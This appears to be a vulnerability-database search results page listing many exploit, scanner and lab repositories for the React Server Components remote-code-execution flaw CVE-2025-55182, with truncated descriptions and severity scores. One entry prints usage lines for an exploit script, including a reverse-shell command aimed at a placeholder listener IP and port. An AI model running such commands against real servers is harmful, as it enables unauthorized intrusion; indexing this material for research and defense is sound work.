Lucene search
+L

800 matches found

Kitploit
Kitploit
added 2026/09/22 6:30 a.m.7 views

React2Shell_CVE-2025-55182

CVE-2025-55182 模块化利用工具与WAF绕过 提供交互式shell的Python脚本,用于利用易受攻击的React Server Components和Next.js应用程序中的关键RCE漏洞(CVE-2025-55182)。该漏洞利用针对反序列化缺陷,允许未经身份验证的远程代码执行。它包含一个用于添加WAF绕过技术的模块化系统。 !NOTE 此漏洞利用工具旨在与易受攻击的RSC协议端点交互。执行结果通过服务器的响应机制捕获。不产生输出结果的命令将返回empty。 !CAUTION 此代码仅用于研究和教育目的...

10CVSS8.1AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 6:20 a.m.12 views

React2Shell

React2Shell CVE-2025-55182 扫描器与利用工具包,用于 Next.js/React 服务器组件 RCE。 仓库结构 root@kitploit: React2Shell/ ├── browser-extension/ 基于浏览器的检测 Chrome 扩展 │ ├── manifest.json │ ├── content.js │ ├── popup.html/js │ └── background.js ├── cli/ 命令行扫描器与利用工具 │ ├── react2shell.py │ └── requirements.txt ├── docs/ 面向学习的...

10CVSS7.9AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 6:19 a.m.7 views

React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web

React2Shell CVE-2025-55182: The Deserialization Bug That Broke the Web ⚡ React2Shell, CVE-2025-55182, RCE Vulnerability: A critical breakdown of the unsafe deserialization flaw in React Server Components that enables unauthenticated remote code execution across default React/Next.js setups. ⏩ TL;...

10CVSS8.1AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 5:54 a.m.7 views

mitigate-cve-2026-23869-react-server-component-loops

如何修复 CVE-2026-23869:缓解 React 服务端组件循环 保护现代企业前端应用需要持续监控服务端数据获取布局和框架组件生命周期。随着 CVE-2026-23869 的近期公开披露,工程团队正面临与 React 服务端组件内不受控制的渲染循环相关的严重漏洞。这一关键安全漏洞允许未经身份验证的网络请求触发递归渲染状态,从而瞬间耗尽后端服务器内存层。若未及时修补,一波自动化利用流量可能导致应用程序容器永久冻结,并在云基础设施中造成全面的网络拒绝服务日志。 为确保您的部署流水线安全,Web...

7.5CVSS7.5AI score0.01551EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/22 5:51 a.m.5 views

CVE-2025-55182

Next.js React 服务端组件 RCE 漏洞利用 通过原型污染利用 CVE-2025-55182 实现远程代码执行。 安装 root@kitploit: uv sync 使用方法 命令执行 root@kitploit: source .venv/bin/activate python3 exploit.py -u https://example.com -c "id" 反弹 Shell root@kitploit: python3 exploit.py -u https://example.com -r -l YOURIP -p 4444 -P nc-mkfifo 选项 -u,...

10CVSS8.2AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 5:00 a.m.7 views

WEB-CLI_RCE_React2Shell

REACT2SHELL 🎯 快速概览(这是什么?) 该工具是一个针对 CVE-2025-55182 的简单概念验证(PoC)漏洞利用程序。这是在使用了 React Server Components 的 Next.js 应用中发现的一个严重缺陷(原型污染)。 如果目标服务器存在漏洞,该脚本可让你在服务器上执行操作系统命令(远程代码执行,即 RCE)。 该工具专为学习、CTF 比赛和负责任的安全研究而构建。 ⚠️ 学生与 CTF 玩家免责声明 请合乎道德地使用。 仅可针对你拥有或已获得明确书面测试许可的系统运行此漏洞利用程序。未经授权的使用属于违法行为。此工具仅供教育目的使用。 🌟 如何使用...

10CVSS7.7AI score0.99802EPSS
SaveExploits391References2
Kitploit
Kitploit
added 2026/09/22 4:53 a.m.15 views

CVE-2025-55182-Scanner

CVE-2025-55182 - React Server Components RCE Scanner A comprehensive security testing toolkit for CVE-2025-55182, a critical pre-authentication remote code execution vulnerability in React Server Components. 🎓 NEW: Complete Educational Guide Available! Want to understand this vulnerability 100%? ...

10CVSS7.9AI score0.99802EPSS
SaveExploits391References1
Kitploit
Kitploit
added 2026/09/22 4:46 a.m.7 views

React2Shell-PoC-CVE-2025-55182

模拟 React2Shell CVE-2025-55182 漏洞利用 注意: 本文档仅用于学习和安全研究目的。 未经授权,请勿用于攻击系统。 1. 概述 CVE-2025-55182,又称 React2Shell,是一个影响 React Server Components RSC 的严重远程代码执行(Remote Code Execution, RCE)漏洞。它通过 Flight 协议在客户端和服务器之间进行通信。当客户端请求数据时,服务器会收到一个 payload 并对其进行解析,这可能允许攻击者注入 React 会视为合法的恶意结构或任意代码。 项目| 内容 ---|--- 严重程度...

10CVSS8.1AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 4:17 a.m.7 views

react2shell-toolkit

Next.js RCE 评估工具包 一个用于在授权环境中验证和调查 CVE-2025-55182(也称为 React2Shell )的 Python 工具包。该漏洞影响 React 服务端组件,并可能使基于 Next.js 等框架构建的应用程序暴露于未经身份验证的远程代码执行。该工具包集成了目标收集、批量验证、交互式测试 Shell、主机枚举以及可选的后验证工具。 漏洞 CVE: CVE-2025-55182 名称: React2Shell 类型: 未经身份验证的远程代码执行 受影响技术: React 服务端组件及依赖框架,包括受影响的 Next.js 配置 工具包验证:...

10CVSS8.2AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 3:22 a.m.14 views

vulnerable-next-js-poc

CVE-2025-55182 React2Shell - Proof of Concept ⚠️ SECURITY RESEARCH ONLY This repository contains a proof of concept for CVE-2025-55182 , a critical remote code execution vulnerability in React Server Components. This is for authorized security testing and research purposes only. Vulnerability...

10CVSS8AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 2:45 a.m.9 views

React2Shell-CVE-2025-55182

🎯 React2Shell CVE-2025-55182: From React Server Components to Full RCE Difficulty: Intermediate → Advanced Category: Web Exploitation | Deserialization | RCE 🧩 Task 1: Introduction — Why React2Shell Is a Big Deal CVE-2025-55182, nicknamed React2Shell , is one of those vulnerabilities that instant...

10CVSS7.8AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/22 2:43 a.m.8 views

React2Shell

Docker 实验室与检测扫描器及 PoC 验证:React2Shell CVE-2025-55182 免责声明: 本仓库及其 PoC 工件严格用于在隔离实验室环境中的教育、研究和防御性安全演示目的。未经授权对系统进行测试是严格禁止的。 1. 项目管理与授权边界 项目目的 本仓库提供了一个可复现的双容器 Docker 环境,旨在分析、利用并验证针对 React Server Components RSC Flight Protocol 反序列化漏洞(通常称为 React2Shell / CVE-2025-55182 )的缓解措施。该实验室演示了在未打补丁的 Next.js...

10CVSS7.6AI score0.99802EPSS
SaveExploits391References1
Kitploit
Kitploit
added 2026/09/22 1:00 a.m.8 views

CVE-2025-55182

CVE-2025-55182 Scanner & Exploiter !Warning This repository is intended for educational and research purposes only. Use the provided PoCs exclusively on systems you own or have explicit permission to test. Unauthorized access , exploitation, or misuse of any material in this repository is illegal...

10CVSS8.6AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/21 11:39 p.m.11 views

React-Server-Components-RCE

React Server Components 远程RCE利用工具 📖 工具简介 React Server Components 远程RCE利用工具是一款专门针对 React Server Components 和 Next.js 框架远程代码执行漏洞的安全测试工具,提供图形化操作界面,支持多种攻击模式和批量检测功能。 ⚠️ 免责声明 :本工具仅供授权的安全测试和CTF竞赛使用,严禁用于非法攻击。使用本工具造成的任何后果由使用者自行承担。 🎯 漏洞影响范围 React Server 受影响版本 React Server 19.0.0 React Server 19.0.1...

6.2AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/21 11:14 p.m.14 views

CVE-2025-55182-Exploit-extension

RSC Fingerprint Detector A Chrome extension for detecting React Server Components RSC and Next.js App Router fingerprints on web pages. ⚠️ Important Notice This extension is intended for educational and security research purposes only. It includes functionality that may be used to test for...

10CVSS7.8AI score0.99802EPSS
SaveExploits391References1
Kitploit
Kitploit
added 2026/09/21 10:56 p.m.6 views

CVE-2025-55182-golang-PoC

CVE-2025-55182 React Server Components RCE - Go PoC ⚠️ FOR AUTHORIZED SECURITY TESTING ONLY ⚠️ Description CVE-2025-55182 also known as CVE-2025-66478 is a critical Remote Code Execution vulnerability in React Server Components Flight protocol. This tool is a Go implementation of the PoC for...

10CVSS7.7AI score0.99802EPSS
SaveExploits391References2
Kitploit
Kitploit
added 2026/09/21 10:11 p.m.9 views

CVE-2025-55182

CVE-2025-55182 / CVE-2025-66478 — Next.js Middleware / RSC 绕过分析 作者对因本研究造成的滥用或损害不承担任何责任 仅供教育和防御目的 描述 本仓库包含一个小型实验环境和针对 CVE-2025-55182 及其副本 CVE-2025-66478 的概念验证分析,涉及 Next.js React Server Components RSC 和 中间件授权绕过行为 。 此 PoC 的目标是重现漏洞所需的内部请求流条件,分析中间件行为,并理解 x-middleware-subrequest 在特定配置下如何影响受保护的路由。 本仓库 不...

10CVSS8.2AI score0.99802EPSS
SaveExploits405
Kitploit
Kitploit
added 2026/09/21 9:54 p.m.5 views

CVE-2025-55182-shellinteractive

CVE-2025-55182-shellinteractive 基础代码源自: https://github.com/Emiyelbarto/CVE-2025-55182-PoC 非常感谢您做出的出色贡献。 概述 CVE-2025-55182 是 Next.js/React Server Components 中的一个反序列化漏洞,允许未经身份验证的远程攻击者在受影响服务器上执行任意代码。该漏洞源于 React Server Actions 对序列化数据的不正确处理。 主要特性: ✅ 交互式 Shell,支持命令历史记录和自动补全 ✅ 自动漏洞检测 ✅ 远程命令执行 ✅ 文件上传/下载功...

10CVSS8.5AI score0.99802EPSS
SaveExploits391References1
Kitploit
Kitploit
added 2026/09/21 8:29 p.m.9 views

vuln-app-CVE-2025-55182

存在漏洞的 Next.js RSC 应用程序 - CVE-2025-55182 ⚠️ 警告:此应用程序故意存在漏洞,仅供教育和安全研究目的使用。请勿部署到生产环境或暴露到互联网。 概述 这是一个存在漏洞的 Next.js 应用程序,用于演示 CVE-2025-55182 ,这是 React Server Components 中的一个严重远程代码执行漏洞。该应用程序被设计为看起来像一个专业的云托管仪表盘,同时故意保留漏洞以用于安全测试和教育目的。 CVE 详情: CVE ID: CVE-2025-55182 严重性: 严重(CVSS 9.5) 受影响版本: React 19.0.0,...

10CVSS8AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/21 8:20 p.m.12 views

reactguard

ReactGuard 由 Xint 驱动的 React2Shell 扫描器。 ReactGuard 为支持 React Server Components 的框架提供针对 CVE-2025-55182 React2Shell 的框架检测与漏洞检测工具。 它还包含针对 CVE-2025-55183、CVE-2025-55184 和 CVE-2025-67779 的检测器。 支持状态 Next.js 14-16 和 Waku 0.17-0.27:主要支持,覆盖范围已验证。 Expo server actions、React Router server actions 和通用...

7.8AI score
SaveExploits0
Rows per page
Query Builder